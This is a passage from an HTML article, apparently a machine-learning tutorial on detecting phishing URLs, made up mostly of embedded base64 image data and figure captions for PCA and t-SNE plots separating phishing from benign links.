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" /></div>
<div style="text-align: center;">
<i>Figure 3.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique with <i>min-max feature normalization</i> (phishing links - orange dots, benign links - blue dots).</div>
<br /></div>
<div>
Let's try another algorithm - T-distributed Stochastic Neighbor Embedding (<a href="https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding">t-SNE</a>), which is a non-linear technique for reducing the dimension of data with and without feature scaling.</div>
</div>
<div>
<br /></div>
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image1_44vDkzo.png" /></div>
<div>
<br /></div>
<div>
<div style="text-align: center;">
<i>Figure 4. </i>Visualization of URLs in the two-dimensional space after applying the t-SNE technique (phishing links - orange dots, benign links - blue dots).<br />
<br />
<i><br /></i>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAXkAAAD4CAYAAAAJmJb0AAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+/AAAADh0RVh0U29mdHdhcmUAbWF0cGxvdGxpYiB2ZXJzaW9uMy4xLjEsIGh0dHA6Ly9tYXRwbG90bGliLm9yZy8QZhcZAAAgAElEQVR4nO3dd3hb1fnA8e+r7b1iJ47jxNkhgRCCw0ga9i67pSVQSkvblB9QCqWDlkLTQUuhQKFQILSU0DI62JQRQoEQVnD2Ins6Tmwn8basdX5/SHE8JFuOJQ/5/TyPHkt3nPPqRnl1de6554gxBqWUUonJ0tsBKKWUih9N8koplcA0ySulVALTJK+UUglMk7xSSiUwW28H0NKgQYNMUVFRb4ehlFL9ypIlSyqNMbnh1vWpJF9UVERJSUlvh6GUUv2KiGyPtE6ba5RSKoFpkldKqQSmSV4ppRKYJnmllEpgmuSVUv2KP2CobvTS6PX3dij9Qp/qXaOUUh3ZVFnHstJqAALGMDjNxfSibBxWPV+NRI+MUqpfKKtpZMmuKnwBgy9gCBjYU+Pmo637eju0Pq3bSV5ECkXkXRFZJyJrROT7oeVzRKRURJaHHud1P1yl1EDU4PGxcMs+Am1GRjfAntombbrpQCyaa3zALcaYpSKSBiwRkbdD6+43xvwhBnUopQawD7a2T/AHGaCyvonCzOQejam/6PaZvDGmzBizNPS8FlgHFHS3XKWUAjjQ4OFAg7fDbfbWNvVQNP1PTC+8ikgRcAzwKTADuEFEvg6UEDzbPxBmn9nAbIDhw4fHMhylVD8XMIaFWyrpbP66tmf5jV4/y0urKa1pxCLCqJwUjhqSjtUicYu1r4rZhVcRSQWeB24yxtQAjwCjgSlAGXBvuP2MMXONMcXGmOLc3LDj6yilBqhdVY00+QIdbiNAYWZS82uvP8Bb6/ey/UADXr+hyRdgQ3kt722qwO31M9CmPI3JmbyI2Akm+KeNMS8AGGP2tlj/OPBaLOpSSg0c1W4v/k5y8tB0F0PSnADUNvn4cOs+Gr2tvxj8BsrrPby8pgyH1cIxBRkUZafEK+w+pdtJXkQE+CuwzhhzX4vl+caYstDLS4DV3a1LKTWwpDnt2CyCL8xV1wyXjaOHZjA03YWIsHVfPZ/saNci3ErAgNsXYPGOKpw2K/nprniF3mfE4kx+BnAVsEpEloeW/QyYJSJTCF783gZ8NwZ1KaUGkMLMJJbvrmqV5AVIsls5Z8JgLCJ4fAHe3rCHmqbou1H6jWH1nhpN8tEwxiwieNzber27ZSulBjarRThrXB6Ld1axp8YNBJtniodnYZFg2nl1bRmeztp0wqhv8sU01raMMVRtXsW+z0twZuSQP+1MbK6e7+apwxoopfq0ZIeNU0YPIhC6YHowuQNsLK87rAQPkJlkx+cPYIvDkAgm4Oez+79PxeqPCPi8WOwOVs27k+m3/Y3MkZPYu+x91j13H3V7d5CUNZhhMy9k5NlX4kjJiHks0peuNBcXFxudGUopFa3X1pZR24VmmrYEyEt1cvyILFIckc95Gzx+lpZWsbvajUVgRHYyU4ZmYA99QRhj2FvXRFm1G7vNgu3z99g8bw7+psZW5STl5HPkN37Okj/dQsDjbldPxqgjmXHbk9iSunZRWESWGGOKw63TsWuUUv1XF89RbZbWbcsGKK9rYsGGiuZfCm0d7JK5s6oRvzF4A4Yt++p5d1MlxhiMMSzauo8Ptuzj84o61uypYXnKkbhHHBusw+7CN/F0vFMvptGZyeqnfhs2wQNUb1nNB7+Y1bU31dl7jmlpSinVg0YPSmH57pqotrVZhJHZyWzZ34C/xYVcA3j8AUqr3a362xsTHARty7463G366gdMsHtnZb0Ht89PWW1Tc5kBA9gceM79MdJQTdOlvwKxgsWKxxiaNizE8fo9SIRvqNrSzdTs3EB64biuHYxI7zsmpSilVC8YlGzv0vaNXn+rBH+QP2Co9/io9/hYsrOK0prwZ9pt96lyeymrcYctExOg6ZJfgTO11WLfEacRcKXh+PDvWPduCFt2/Z7tMUvy2lyjlOq3tlV1nowPMsCwjCRsYYY2sFqEVIeN+evLo0rwB8tr8vopjzRujiMJnGHa1i1WAqOOxz3rXjwnfq3dahEhLUYJHjTJK6X6sRp35IHLDnbCsQhYRThheBbDs5JJsltp0UEHi0C600aDx4fX3/EQCm2t2lOLN9LwmGIJ37n8YHB2F97jLyeQObTVqtzJM0gdMqJLcXREm2uUUv3WoBQnlfWedgOUWQRmjMzhQIMHm8XCiKxkkh1WAM4cl8fKsmp2HGhEBEZmJTNpSBofb9/f6RAKXdf5gGj+UcdjWfoiAFZnMsf94E8xjUCTvFKq3xqXm8rGyjqM3zRfxrSKUJiZxLCM4KMtp83CtMIsphVmETAGt9fP2xsqqInzzVFhGQN+DwBWh4txl1yLxeaIaRWa5JVS/VaS3crZ4wezvLSaPbVu7FYL43JTmJCX1mo7T101+9Z9htWVxKAjjqMxICzecYC9tU1d7YXZZUIHPT1FcO5aAXYHQ084hzHnXxPz+jXJK6X6tTSnjZmjciKu3zr/GdY8fTcWWyjdOVNonP13vMbSpQSflWRjbG4amyvr2NfJJCYQTO52q3D00Ey2H2ig3uOjweNvHtPeGJiSayNz9hzSCsaQlD24C9FET5O8UiphVW1dw9pn7iHgbSLgDfaC8Y46EU9TU7D3SxdMKcjEKhJVgrdbhWEZSUzOzyDZYWXMoGAvG7fXz+4aNyJQkJ6Ew2YBYneRNRxN8kqphLXj3efxez2tlgWyCruc4AF2HmiktLqxw20yXTaOHZZFXmh8+7Zcdiujcnp2HHtN8kqphOVtqAHTuluktWILPk9jlxO93wRo7GCWqi8dmY/Dbj2sOONJ+8krpRJW/rQzsTpbD+9r3fgh0lgdRefG1nYc6PgsXvpoNu2jYSmlVPcNKT6drDGTsTpDZ+0i2Gw2JtevZURWcti7XyOxiJBij5wyF++o6m64caHNNUqphGWx2jjh1scpWzyf3Z+8iS0plRGnXUb2uGMAWLe3luW7q6MqywBpLjv13vDDGJRWN1Lr9pLm6tp4OvEWizleC4GngCFAAJhrjHlARLKBfwJFBKf/+4oxpuMJGJVSKsYsVhsFJ55HwYnntVtX5faE2SNCORIcljgSEWF/Y99L8rForvEBtxhjjgBOAK4XkYnArcA7xpixwDuh10op1WcMTg3fCyacUTkpWKXj5p0URwJeeDXGlBljloae1wLrgALgImBeaLN5wMXdrUsppWJpeGb0c642ePz4O5hJL9VhJSc5tkMSxEJML7yKSBFwDPApMNgYUwbBLwIgL8I+s0WkRERKKioqYhmOUkp1yNLFC68FGUlYw+wyKNnOqWNykU7O9HtDzJK8iKQCzwM3GWOim6oFMMbMNcYUG2OKc3NzYxWOUkp1yiJCThQTj1gtwoisJE4ckc3oQYeabdKdNk4encOZ4wfj6oN95CFGvWtExE4wwT9tjHkhtHiviOQbY8pEJB8oj0VdSikVS0fnZ/C/zZUR11stQkG6i/x0FyLCscOymFqQScDQPA5NX9btM3kJ/j75K7DOGHNfi1WvAFeHnl8NvNzdupRSKtYsFonYX95hFU4ZNYjpRdmtmmJEpF8keIjNmfwM4CpglYgsDy37GXAX8C8R+RawA7gsBnUppVRMpTptBMJcUBVgaHpSxHFo+otuJ3ljzCIiT39yenfLV0qpeEqyWynMTGJXVWOrmaEsFmHi4LTIO/YTOqyBUmrAO354NmNzU5ubbTKTbJw6ehAZSX3rxqbDocMaKKUGPKtFOKYgkylDMzAEe90kCk3ySikVIiJdHp2yr9PmGqWUSmCa5JVSKoFpkldKqQSmSV4ppRKYJnmllEpgmuSVUiqBaZJXSqkEpkleKaUSmCZ5pZRKYJrklVIqgWmSV0qpBKZJXimlEpgmeaWUSmAxSfIi8oSIlIvI6hbL5ohIqYgsDz3Oi0VdSimloherM/kngXPCLL/fGDMl9Hg9RnUppZSKUkySvDFmIbA/FmUppZSKnXi3yd8gIitDzTlZ4TYQkdkiUiIiJRUVFXEORymlBpZ4JvlHgNHAFKAMuDfcRsaYucaYYmNMcW5ubhzDUUqpgSduSd4Ys9cY4zfGBIDHgePiVZdSSqnw4pbkRSS/xctLgNWRtlVKKRUfMZnIW0SeBU4BBonILuAXwCkiMgUwwDbgu7GoSymlVPRikuSNMbPCLP5rLMpWSil1+PSOV6WUSmCa5JVSKoFpkldKqQSmSV4ppRKYJnmllEpgmuSVUiqBaZJXSqkEpkleKaUSmCZ5pZRKYJrklVIqgWmSV0qpBKZJXimlEpgmeaWUSmCa5JVSKoFpkldKqQSmSV4ppRKYJnmllEpgMUnyIvKEiJSLyOoWy7JF5G0R2Rj6mxWLupRSSkUvVmfyTwLntFl2K/COMWYs8E7otVJKqR4UkyRvjFkI7G+z+CJgXuj5PODiWNSllFIqevFskx9sjCkDCP3NC7eRiMwWkRIRKamoqIhjOEopNfD0+oVXY8xcY0yxMaY4Nze3t8NRSqmEEs8kv1dE8gFCf8vjWJdSSqkw4pnkXwGuDj2/Gng5jnUppZQKI1ZdKJ8FPgbGi8guEfkWcBdwpohsBM4MvVZKKdWDbLEoxBgzK8Kq02NRvlJKqcPT6xdelVJKxY8meaWUSmCa5JVSKoFpkldKqQSmSV4ppRKYJnmllEpgmuSVUiqBaZJXSqkEpkleKaUSmCZ5pZRKYJrklVIqgWmSV0qpBKZJXimlEpgmeaWUSmCa5JVSKoFpkldKqQQWk0lDOiIi24BawA/4jDHF8a5TKaVUUNyTfMipxpjKHqpLKaVUiDbXKKVUAuuJJG+A+SKyRERmt10pIrNFpERESioqKnogHKWUGjh6IsnPMMZMBc4FrheRk1quNMbMNcYUG2OKc3NzeyAcpZQaOOKe5I0xu0N/y4EXgePiXadSSqmguCZ5EUkRkbSDz4GzgNXxrFMppdQh8e5dMxh4UUQO1vWMMebNONeplFIqJK5J3hizBTg6nnUopZSKTLtQKqVUAtMkr5RSCUyTvFJKJTBN8koplcA0ySulVALTJK+UUglMk7xSSiUwTfJKKZXANMkrpVQC0ySvlFIJTJO8UkolME3ySimVwDTJK6VUAtMkr5RSCUyTvFJKJTBN8koplcDinuRF5BwRWS8im0Tk1njXp5RS6pB4z/FqBR4GzgUmArNEZGI861RKKXVIvM/kjwM2GWO2GGM8wHPARXGuUymlVEi8k3wBsLPF612hZUoppXpAvJO8hFlmWm0gMltESkSkpKKiIs7hKKXUwBLvJL8LKGzxehiwu+UGxpi5xphiY0xxbm5unMNRSqmBJd5J/jNgrIiMFBEHcDnwSpzrVEopFWKLZ+HGGJ+I3AC8BViBJ4wxa+JZp1JKqUPimuQBjDGvA6/Hux6llFLt6R2vSimVwDTJK6VUAtMkr5RSCUyTvOp3TMCPu2Y/Ab+vt0NRqs+L+4VXpQ6XMcH75kSk+fXqf/yerW8+BaF1aSOO4OhrfkHW6CMRi7XXYlWqr9Ikr/ocb30Nq+bdye5P3iTg9+FIzURsNkQE9/69rbat3b6ORXNmYbU7GXTkiQw/+VIGTz0Fi1U/2kqBJnnVRzRUlLL677+jfMUiAj4vYJrP1j21+zve2Rj8Hjd7l75LxeqPyRgxgek/n4fV7oh/4Er1cdomr3qdt6GOhbd/lT1L3iXgbQITaE7wXRXwuKnZ/jnb3/lnjKNUqn/SM/kE4vf7+eD2r1CzbW3zMtegApoO7AUTIH3EBIpv/CMpgws7KKV7TOis2mp3RN1GvvODl/A3NQSTewz4PW52LnqFUedc1bys9KP/suGlx3BXVZA9dgpHXH4z6YXjYlKfUn2ZJvkE8r8fnE1jRWmrZe7KQ6+rt67lnVvO5ZxHP8KRmh6xHGMMVZtXUr93JxkjJpA2bExU9e9dvpBVf/s1jfvKsNgdjDj9q0y8/AdYbPYO96veugZ/U2NUdUTLajvUVLPp1b+y/oWHm+vYu+x9Ktcu5qTf/Iu0gtExrVepvkaTfAKo37uTzW/Ma5fgwwr4WfLQDznx1rlhV3vqqvjot9dQX7YdESEQ8JM76QSm3fwAFlvkNu79G5dT8sfv4/e4AfA3NbJ9wXP4GuuY8p1fdxhS+vDxWBwuAqF9u8vqTGLE6V8B4MDmVaz95/0Q8LfYIvhrY/3zD1F84/0dlmUCfirXLsZTe4Ds8ceSlD04JjEq1VM0yfdze5e9R8kDN+P3eaPep2LVInzuBmyu5HbrVjx+B7U7N2H8h8qrWPMxG158jAmXfS9imRtefLQ5wR/k97jZtehVJl3xI+wpkX85FJ50CRtefDTUHh9qixcLh6YeECwOB8bvx5WVh7euCuP3t6vvoNyjZjBsxgWsefoetrz1jzYJPsQEOLBpZcSYAOp2b+WjO7+Br7EegIDfy6izr+KIWbc0d+tUqq/TJN+PBfw+Sh78QcRkF5FYKF+5iKHHndVqsd/rYc/SdzFtbjIKeJrY/u6/O0zydWVbwi63WG007t/TYZJ3pGYw81fPsvKvv6Ry3WeIxcrQE85m8jdux56Sjs/dQOO+PSRlD8aWlALA+7d9meqt7Qc0tbqSGX3e1VRtWc22t5/B+DwR63VmRp6/wBjDp/dci/tABS3nudn69jNkj5/KkGNPi7ivUn2JJvl+7PN/PXBYbdlWu6NdIgeCZ+8RerV09kWSOXISDeWl7S6eBgJ+knM7n/ExNX8k03/+JCYQAJFWN0DV79mO+0A59pS05iSfM6GYmh0bWv3iCL4HP2nDxrLhpUfxe5s6rDNrzNER19XsWI+7qnWCh2Az1Na3n2lO8sYYjN+LWO16dq/6JE3y/ZQJ+Nm24LnD29fvJ/eoGe2W21wppBWOpWb7561XWKwMnnJyh2WOu/Q69i57v9WXjtWZxKhzv47NlRJ1bGI51Ku3qXofH8yZFfzywIAIhSddwpTv/Jox51/DzoUv4m3wN3+xWJ1JjDzrShypGaGEK7RN0s1vye4go+iIiHH4mxoj9g7yNdQBsHPRK6x9+h6aqiuxJaUw7tLrGX3eNzTZqz5F+8n3U976mq4304SkF03AkZrRbrkxhjEXfBuL3YlYgz1irA4XzrRMJs66peMyh41lxu1/J2ficVidSSQNGsrEK37IhMu+f1gxAiz65ddo2LvzUL/5QICd7z3PljefwpWVx0l3Pk/B9C/izBhEasFojrz6No64/AcADD3hvA7vehWxkh+hySXg8yA2B74wx9ficFEw/YvsXjyfZY/8lKbqSgB8jfWsffpu3vjO8Xz+/EMEOmgmUqon6Zl8P1S7axMbXno0bJNLNLz1te2WuQ+U88ld36G+fCcWqw2/303K0FGMOPXLjDjlSx22qR+UOWoSM34+77Biaquhsoz6PdvCrtv40qOMPvdqUvKGcez1d7dbX7dnO8v+/GNMmH73B7+8Rn3xG1idSe3W73j/BVY/9bvgF2iY45ucN4zhp36Zd285L2y/fl9DLRuef5gNzz/MCT99gryjTuzsrSoVV3E7kxeROSJSKiLLQ4/z4lXXQGACfko/+i8f3DGLd2+9iNKPD3OyLRHSh7XvG/7Z/TdSW7oZf1MjPnd9cKTHfWUk5xZEleBjrWbn+ojrvA3tv6QOMoEAH//2Gur2bGv9JShWXFmDEYuAwNY3nmLBTWfSUHloXvnKdYtZ9bdf42usC/sFKhYrg6echM2ZRGObMXTC+fTu2XjqqjvdTql4iveZ/P3GmD/EuY6EZwIBPv3DdexbVxK8M7QbrHYnYy++ttWyhopSqrd/jmnT1dDf1MiWN55q1wsnXowxlH74Ghtf/QtNVRURt3Ok57R67fd62LPkHRoqShGrFU9tVfsLyMYfvJAaOvv2+bz4PY0se+RWZtz+FACbXnuiwyYwE/Czf/0yAKwOZ6fNZcbvo+yztxlx6pc73E6peNLmmj6uets61v3rAcpXLOr2bf9JOflMufa3ZI6c1Gq5t6EWi9UW7Kfehqeuqlt1dsWGFx9h06t/6bTH0KQrftT8vL58F4vmzMLnbiTgbUIsFgLeCPcMtDl+JhBg/4Zl+BrrsSWl4N63p8N6xWIhNb8IgIIZF7Dj3X93+p46+tWhVE+I94XXG0RkpYg8ISJZ4TYQkdkiUiIiJRUVkc/eBqId773Awl/Monz5+zEZ18VTewB7Umq75WkFo8HS/qNgsTnILz692/VGw9dYz8ZXHo+c4EUQq40jZt3CsBnnNy9e+vCPaKrej99dj/H7CHg9ROpRE8nBXzCDJp3Q3GYfjsXmYPR53wBg8jV3YHG4Oi7YYiH3qOldikWpWOtWkheRBSKyOszjIuARYDQwBSgD7g1XhjFmrjGm2BhTnJsb+eaUgWb9i4+wfO5tmE76eh8S7LZnc6WE7hZtz+9p4vP/PNRuucVm5+hvzcHqcDXva7E7cWbkNCe1eKsr29ZhbxhHSgbnPr6YsRd8u3mZt76Gqi2ro/8CtLQtX0gfPr75msOYC76FPTkVaRuHxUJSTj7Tbv4T6cODg5pZrDbOfPAdUoYURaxu2IwLyBg+PrrYlIqTbjXXGGPOiGY7EXkceK07dQ0kSx+5lV0fvBz19q6cIRR/736cWbm49+3BYrPz0Z3fDNN+byJe0Cw48TxShoxgy5t/p3FfGXmTZ1J0xlexJ6d1451Ez5Wd12G3Q7/XQ2NlaavB0owJ3jgVLavdDuLA727A6kzCYrMz9f/uOhRDZi6n3PUSG156jIqVi3Bm5jLy7CvJmVCMM2NQu/7vzvRsTr/vDeorS9n6xj8o/eQNvPU1JOUMZuLlNzOk+MwuHAGl4iNubfIikm+MKQu9vARYHa+6EklDRSm7PnilS/ukDxtL9rgpAKTkFuBzN4TtPgiQVhB5RMnMkZNaJb2e5MrMJe/ok9hT8g7hmluM8bdrHnGkZpJeOJbqrevC7tOujECASV/7MQ3lu0gZMoKCE7+IPbl185UrK4/J37y9S7GnDCrgyKt+wpFX/aRL+ynVE+LZJn+3iKwSkZXAqcDNcawrYexd+h5daVO22J3kHT2z1TKbK5mRZ8xq1w/c6nAx/kvXxyDK+Jh63e/JHHNU+xViIXVIESl5w8Lsczf2lPSwfd7bstgdpA0bw6Qrf0zR6V9tl+APhwkE8DbUBYdjUKoPituZvDHmqs63Um2J1UpHt+O33taOK3MQw0++tN26iVf8EHtKOptf/xve+hpSh47iyKt/RvbYKbEPOkZsrmRmznmWpX/+CWWfzQ8OKyAW7MmpTLv5T2H3SSsYzRkPLGDdv/7ItvlPd1h+wNtE6tBRUcUS8HkRq61dE423oZqVf7sTZ2YOzvRBbHz5MfxNjdiTU5nwlZsoOv2r0b1ZpXqImMOcZi0eiouLTUlJSW+H0WW1pZvZv2EpzoxB5E3+QrtJMowxmIC/3YXFgN/HvrWL8bkbyDliGo7UDNxVFbz9vdPC3owz5sLvkDF8PFve+gfe+hryp53J6C9+M+wQBa3qDwRajQnTH9SVbWX/xhW4MnPJPfKEDmeZWvLwTyj96LUOL8BaHS6GfeECjv72rzqsd+fCl1